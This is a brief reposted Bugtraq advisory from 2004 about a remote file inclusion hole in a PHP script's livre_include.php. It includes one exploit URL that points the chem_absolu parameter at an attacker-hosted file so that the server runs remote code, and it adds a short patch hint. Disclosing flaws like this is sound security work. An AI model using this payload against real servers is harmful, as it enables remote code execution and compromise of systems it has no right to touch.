QUOTE

°°°°°°°°°°°°°°
Website : http://www.alexphpteam.com
Version : all
Problem : Include file


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
./include/livre_include.php

------------------------------------------------------------------
if (!$no_connect).... some include() functions
------------------------------------------------------------------

Exploit :
°°°°°°°°°
http://[target]/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f


Patch :
°°°°°°°
You must to fix the variable $chem_absolu.


Nourredine Himeur aka LostNoobs



Source: http://seclists.org/lists/bugtraq/2004/Sep/0383.html